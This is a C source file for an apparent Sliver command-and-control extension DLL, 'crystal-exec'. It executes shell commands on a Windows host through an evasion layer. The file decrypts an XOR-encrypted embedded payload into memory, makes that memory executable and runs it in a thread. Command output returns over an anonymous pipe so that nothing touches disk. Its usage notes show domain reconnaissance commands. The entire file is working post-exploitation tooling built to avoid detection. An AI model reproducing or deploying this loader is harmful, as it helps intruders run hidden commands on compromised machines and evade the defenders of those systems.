/*
 * crystal-exec.c — Sliver Extension DLL
 *
 * Runs a shell command through Crystal Palace evasion. The crystalexec.c
 * post-ex DLL is wrapped by Crystal Palace at build time and embedded as a
 * XOR-encrypted C array in crystalexec_pico.h (generated by crystalkit).
 *
 * Usage in Sliver (after extension install):
 *   crystal-exec --cmd "whoami /all"
 *   crystal-exec --cmd "net user /domain"
 *
 * Design: single callback at the end with all accumulated output. Avoids
 * the Sliver limitation where only the first callback call is shown.
 *
 * Output channel: anonymous pipe (no disk artifact).
 *
 * MIT License — see project root
 */

#include <windows.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#include "crystalexec_pico.h"   /* crystalexec_pico[], crystalexec_pico_len,
                                    crystalexec_pico_key[], crystalexec_pico_key_len */

#ifndef EXPORT
#define EXPORT __declspec(dllexport)
#endif

typedef int  (*ExtCallback)(char *, int);
typedef void (*pico_entry_t)(void *);

/* ── output buffer ───────────────────────────────────────────────────────── */

#define OUT_CAP (4 * 1024 * 1024)

typedef struct { char *buf; int pos; int cap; } outbuf_t;

static void ob_append(outbuf_t *o, const char *s, int len)
{
    if (!o->buf || len <= 0) return;
    int room = o->cap - o->pos;
    if (len > room) len = room;
    memcpy(o->buf + o->pos, s, (size_t)len);
    o->pos += len;
}

static void ob_printf(outbuf_t *o, const char *fmt, ...)
{
    if (!o->buf) return;
    int room = o->cap - o->pos;
    if (room <= 0) return;
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(o->buf + o->pos, (size_t)room, fmt, ap);
    va_end(ap);
    if (n > 0) o->pos += (n < room ? n : room);
}

/* ── PICO execution thread ──────────────────────────────────────────────── */

typedef struct { pico_entry_t entry; void *args; } pico_args_t;

static DWORD WINAPI pico_thread(LPVOID param)
{
    pico_args_t *a = (pico_args_t *)param;
    a->entry(a->args);
    return 0;
}

/* ── pipe drain thread ──────────────────────────────────────────────────── */

typedef struct { HANDLE hRead; char *buf; DWORD len; DWORD cap; } reader_t;

static DWORD WINAPI reader_thread(LPVOID param)
{
    reader_t *r = (reader_t *)param;
    DWORD n;
    while (r->len < r->cap) {
        if (!ReadFile(r->hRead, r->buf + r->len, r->cap - r->len, &n, NULL) || n == 0)
            break;
        r->len += n;
    }
    return 0;
}

/* ── extension entrypoint ───────────────────────────────────────────────── */

EXPORT int __cdecl Initialize(char *argsBuffer, uint32_t bufferSize,
                               ExtCallback callback)
{
    outbuf_t ob = { NULL, 0, OUT_CAP };
    ob.buf = (char *)VirtualAlloc(NULL, OUT_CAP,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!ob.buf) {
        if (callback) callback("error: alloc failed\n", 20);
        return 1;
    }

#define FAIL(msg) do { ob_printf(&ob, "error: " msg "\n"); goto done; } while(0)

    if (!argsBuffer || bufferSize == 0) { FAIL("no args"); }

    /* Parse "cmd=<value>" */
    int scan   = (int)bufferSize < 64 ? (int)bufferSize : 64;
    int eq_pos = -1;
    for (int i = 0; i < scan; i++) {
        if ((unsigned char)argsBuffer[i] == '=') { eq_pos = i; break; }
    }
    if (eq_pos < 1) { FAIL("invalid args"); }

    int cmd_start = eq_pos + 1;
    int cmd_len   = (int)bufferSize - cmd_start;
    if (cmd_len <= 0 || cmd_len >= 4096) { FAIL("cmd too long"); }

    char cmd[4096];
    memcpy(cmd, argsBuffer + cmd_start, (size_t)cmd_len);
    cmd[cmd_len] = '\0';

    /* Anonymous pipe: crystalexec.c writes stdout/stderr here */
    SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE };
    HANDLE hRead = NULL, hWrite = NULL;
    if (!CreatePipe(&hRead, &hWrite, &sa, 0)) { FAIL("pipe failed"); }
    SetHandleInformation(hRead, HANDLE_FLAG_INHERIT, 0);

    /* pico_args: "<hwrite_hex>|<cmd>" */
    char pico_args[64 + 4096];
    int  palen = snprintf(pico_args, sizeof(pico_args), "%p|%s",
                          (void *)hWrite, cmd);
    if (palen <= 0 || palen >= (int)sizeof(pico_args)) {
        CloseHandle(hRead); CloseHandle(hWrite);
        FAIL("args overflow");
    }

    char *args_buf = (char *)VirtualAlloc(NULL, (SIZE_T)(palen + 1),
                                          MEM_COMMIT | MEM_RESERVE,
                                          PAGE_READWRITE);
    if (!args_buf) {
        CloseHandle(hRead); CloseHandle(hWrite);
        FAIL("alloc failed");
    }
    memcpy(args_buf, pico_args, (size_t)(palen + 1));

    /* XOR-decrypt embedded PICO → RW region → RX */
    void *pico_mem = VirtualAlloc(NULL, crystalexec_pico_len,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!pico_mem) {
        VirtualFree(args_buf, 0, MEM_RELEASE);
        CloseHandle(hRead); CloseHandle(hWrite);
        FAIL("alloc failed");
    }

    unsigned char *dst = (unsigned char *)pico_mem;
    for (DWORD i = 0; i < crystalexec_pico_len; i++)
        dst[i] = crystalexec_pico[i] ^ crystalexec_pico_key[i % crystalexec_pico_key_len];

    DWORD old;
    if (!VirtualProtect(pico_mem, crystalexec_pico_len,
                        PAGE_EXECUTE_READ, &old)) {
        VirtualFree(pico_mem, 0, MEM_RELEASE);
        VirtualFree(args_buf, 0, MEM_RELEASE);
        CloseHandle(hRead); CloseHandle(hWrite);
        FAIL("protect failed");
    }

    /* Pipe drain thread */
    DWORD   out_cap = 3 * 1024 * 1024;
    char   *out_buf = (char *)VirtualAlloc(NULL, out_cap,
                                            MEM_COMMIT | MEM_RESERVE,
                                            PAGE_READWRITE);
    if (!out_buf) {
        VirtualFree(pico_mem, 0, MEM_RELEASE);
        VirtualFree(args_buf, 0, MEM_RELEASE);
        CloseHandle(hRead); CloseHandle(hWrite);
        FAIL("alloc failed");
    }

    reader_t rs  = { hRead, out_buf, 0, out_cap };
    HANDLE hRdr  = CreateThread(NULL, 0, reader_thread, &rs, 0, NULL);

    pico_args_t pa = { (pico_entry_t)pico_mem, args_buf };
    HANDLE hPico = CreateThread(NULL, 0, pico_thread, &pa, 0, NULL);

    if (!hPico) {
        ob_printf(&ob, "error: exec failed (%lu)\n", GetLastError());
        CloseHandle(hWrite);
        if (hRdr) { WaitForSingleObject(hRdr, 5000); CloseHandle(hRdr); }
        CloseHandle(hRead);
        VirtualFree(out_buf,  0, MEM_RELEASE);
        VirtualFree(args_buf, 0, MEM_RELEASE);
        VirtualFree(pico_mem, 0, MEM_RELEASE);
        goto done;
    }

    DWORD wres = WaitForSingleObject(hPico, 300000);
    CloseHandle(hPico);
    VirtualFree(args_buf, 0, MEM_RELEASE);

    /* Closing write end sends EOF → reader thread exits */
    CloseHandle(hWrite);
    if (hRdr) { WaitForSingleObject(hRdr, 10000); CloseHandle(hRdr); }
    CloseHandle(hRead);

    if (rs.len > 0)
        ob_append(&ob, out_buf, (int)rs.len);
    else if (wres == WAIT_TIMEOUT)
        ob_printf(&ob, "timeout\n");

    VirtualFree(out_buf, 0, MEM_RELEASE);

done:
    if (ob.pos > 0 && callback)
        callback(ob.buf, ob.pos);
    VirtualFree(ob.buf, 0, MEM_RELEASE);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID v)
{
    (void)h; (void)r; (void)v;
    return TRUE;
}
